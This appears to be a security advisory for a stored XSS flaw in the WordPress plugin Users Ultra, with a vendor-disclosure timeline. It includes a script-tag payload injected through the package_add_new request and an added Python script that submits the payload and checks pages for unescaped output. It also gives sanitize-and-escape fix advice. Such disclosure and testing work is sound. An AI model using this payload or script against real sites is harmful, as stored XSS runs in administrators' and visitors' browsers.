Users Ultra [Persistent XSS]

The WordPress plugin Users Ultra suffers from a persistent (stored) XSS vulnerability.


Once a user is registered, they can add new subscription packages or modify existing ones. No data sanitization takes place before the package details are saved to the database, so a malicious user can include JavaScript in the package name and/or package description. Because the value is stored, the script runs for everyone who later views the package, including an administrator in the back end and visitors of any front-end page that lists packages.


  • Send a POST request to with data: action=package_add_new&p_name=a<script>alert(1)</script>
  • Visit as admin, or go to the page that shows the package information on the front end; the stored payload executes there.
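The two steps above as a small reproduction script. This is an added example, not code from the original advisory or from the plugin. It assumes the handler is reached through WordPress's admin-ajax.php (the endpoint is not named on the page), that the tester already holds a logged-in session cookie, and that the package name is later rendered into HTML; the two sample pages are constructed inline so the classification logic can be exercised offline.

```python
"""Added example (not part of the original advisory): submit the package_add_new
request with the advisory's payload and decide whether a fetched page renders
the stored package name unescaped.

Assumptions (not stated on the page): the handler lives behind
/wp-admin/admin-ajax.php, the caller supplies a valid logged-in cookie, and
the package name is echoed into some HTML page afterwards.
"""
import html
import urllib.parse
import urllib.request

# Payload exactly as given in the advisory.
PAYLOAD = "a<script>alert(1)</script>"


def build_package_request(site, payload=PAYLOAD):
    """Return (url, body) for the package_add_new request described above.

    The admin-ajax.php path is an assumption; the page does not name the endpoint.
    """
    body = urllib.parse.urlencode({"action": "package_add_new", "p_name": payload})
    return site.rstrip("/") + "/wp-admin/admin-ajax.php", body.encode()


def classify(page_html, payload=PAYLOAD):
    """Classify how a page renders the stored package name.

    'vulnerable' - the raw payload appears verbatim, so the <script> executes.
    'escaped'    - only an HTML-escaped copy (&lt;script&gt;...) appears, i.e.
                   the output was run through esc_html() or equivalent.
    'absent'     - the package name is not on this page at all.
    """
    if payload in page_html:
        return "vulnerable"
    if html.escape(payload, quote=False) in page_html or html.escape(payload) in page_html:
        return "escaped"
    return "absent"


def submit_and_check(site, cookie_header, view_url):
    """Live version of the two PoC steps: POST the package, then GET the page
    that lists packages and classify it. Needs network access and a real
    session cookie, so it is not exercised offline."""
    url, body = build_package_request(site)
    headers = {"Cookie": cookie_header}
    urllib.request.urlopen(urllib.request.Request(url, data=body, headers=headers)).read()
    page = urllib.request.urlopen(urllib.request.Request(view_url, headers=headers))
    return classify(page.read().decode("utf-8", "replace"))


# Constructed sample pages (not captured from a real site): what an unpatched
# and a patched install would respectively produce for the stored name.
VULNERABLE_PAGE = "<h3 class='package-name'>a<script>alert(1)</script></h3>"
ESCAPED_PAGE = "<h3 class='package-name'>a&lt;script&gt;alert(1)&lt;/script&gt;</h3>"


if __name__ == "__main__":
    print(classify(VULNERABLE_PAGE), classify(ESCAPED_PAGE))
```

On the fixing side, the standard WordPress remedy for this class of bug is to sanitize on save (for example `sanitize_text_field()` on `p_name` before it reaches the database) and to escape on output (`esc_html()` where the package name is printed); `classify()` above reports "escaped" exactly when the second half of that fix is in place.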

  • 2015-10-20:
    Requested CVE ID
  • 2015-10-29:
    Vendor notified via email
  • 2015-11-11:
    Requested CVE ID (no response from 2015-10-20)
  • 2015-11-11:
    Vendor notified via the contact form on the vendor's website
  • 2015-11-13:
    Vendor notified via support forums at
  • 2015-11-14:
    Vendor responded and received the report by email
  • 2016-02-06:
    Requested CVE ID (no response from 2015-11-11)